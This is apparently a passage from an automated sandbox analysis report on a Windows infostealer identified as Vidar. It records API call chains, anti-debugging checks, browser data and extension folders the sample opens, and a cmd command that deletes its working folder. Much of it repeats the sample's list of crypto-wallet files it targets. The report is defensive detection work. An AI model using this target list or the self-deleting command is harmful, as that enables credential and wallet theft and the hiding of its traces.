                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00409460 FindFirstFileA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,FindClose,0_2_00409460
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00407060 FindFirstFileA,strlen,strlen,memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,lstrcpyA,strlen,Sleep,??3@YAXPAX@Z,??3@YAXPAX@Z,CreateProcessA,Sleep,strlen,Sleep,strlen,strlen,??3@YAXPAX@Z,CloseDesktop,_invalid_parameter_noinfo_noreturn,0_2_00407060
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004170D0 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindClose,0_2_004170D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00401730 FindFirstFileA,FindFirstFileA,FindClose,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,FindFirstFileA,FindFirstFileA,DeleteFileA,DeleteFileA,FindNextFileA,CopyFileA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_00401730
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040A5D0 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,0_2_0040A5D0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00414BD0 wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,lstrcatA,lstrcatA,0_2_00414BD0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00406FE0 FindFirstFileA,FindFirstFileA,??3@YAXPAX@Z,_invalid_parameter_noinfo_noreturn,0_2_00406FE0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040C790 FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040C790
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004081B0 ExpandEnvironmentStringsA,FindFirstFileA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,DeleteFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,CopyFileA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_004081B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0040BC30 wsprintfA,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,lstrlenA,lstrlenA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,FindClose,_invalid_parameter_noinfo_noreturn,0_2_0040BC30
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00415700 HeapAlloc,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,CopyFileA,CopyFileA,DeleteFileA,DeleteFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,_invalid_parameter_noinfo_noreturn,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,0_2_00415700
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00413FF0 wsprintfA,FindFirstFileA,memset,memset,FindNextFileA,strlen,memcmp,strlen,memcmp,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfA,StrCmpCA,wsprintfA,memset,lstrcatA,strtok_s,memset,lstrcatA,DeleteFileA,DeleteFileA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindClose,_invalid_parameter_noinfo_noreturn,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00413FF0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00410BA0 GetSystemInfo,wsprintfA,0_2_00410BA0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                  Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                  Source: Web Data.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                  Source: Web Data.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: outlook.office.comVMware20,11696492231s
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: AMC password management pageVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmp, pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                  Source: Web Data.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                  Source: Web Data.15.drBinary or memory string: discord.comVMware20,11696492231f
                  Source: Web Data.15.drBinary or memory string: global block list test formVMware20,11696492231
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.00000000009D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                  Source: Web Data.15.drBinary or memory string: dev.azure.comVMware20,11696492231j
                  Source: Web Data.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1963090189.000000000096E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:ou?l
                  Source: Web Data.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                  Source: Web Data.15.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                  Source: Web Data.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                  Source: Web Data.15.drBinary or memory string: tasks.office.comVMware20,11696492231o
                  Source: Web Data.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                  Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                  Source: Web Data.15.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                  Source: Web Data.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                  Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                  Source: Web Data.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeAPI call chain: ExitProcess graph end nodegraph_0-12444
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeAPI call chain: ExitProcess graph end nodegraph_0-13068
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeAPI call chain: ExitProcess graph end nodegraph_0-12446
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004188E0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004188E0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011F0 mov eax, dword ptr fs:[00000030h]0_2_004011F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00401170 mov eax, dword ptr fs:[00000030h]0_2_00401170
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00401190 test dword ptr fs:[00000030h], 00000068h0_2_00401190
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004011B0 mov eax, dword ptr fs:[00000030h]0_2_004011B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004108E0 GetProcessHeap,HeapAlloc,GetComputerNameA,0_2_004108E0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00411ED0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00411ED0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00411FA0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,0_2_00411FA0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,GetLocaleInfoA,LocalFree,0_2_004109F0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_0041D850 GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0041D850
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_004108B0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004108B0
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeCode function: 0_2_00410990 HeapAlloc,GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00410990
                  Source: C:\Users\user\Desktop\pjthjsdjgjrtavv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: pjthjsdjgjrtavv.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.pjthjsdjgjrtavv.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: pjthjsdjgjrtavv.exe PID: 6960, type: MEMORYSTR
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: \Electrum\wallets\
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ElectrumLTC
                  Source: pjthjsdjgjrtavv.exe, 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: |1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet 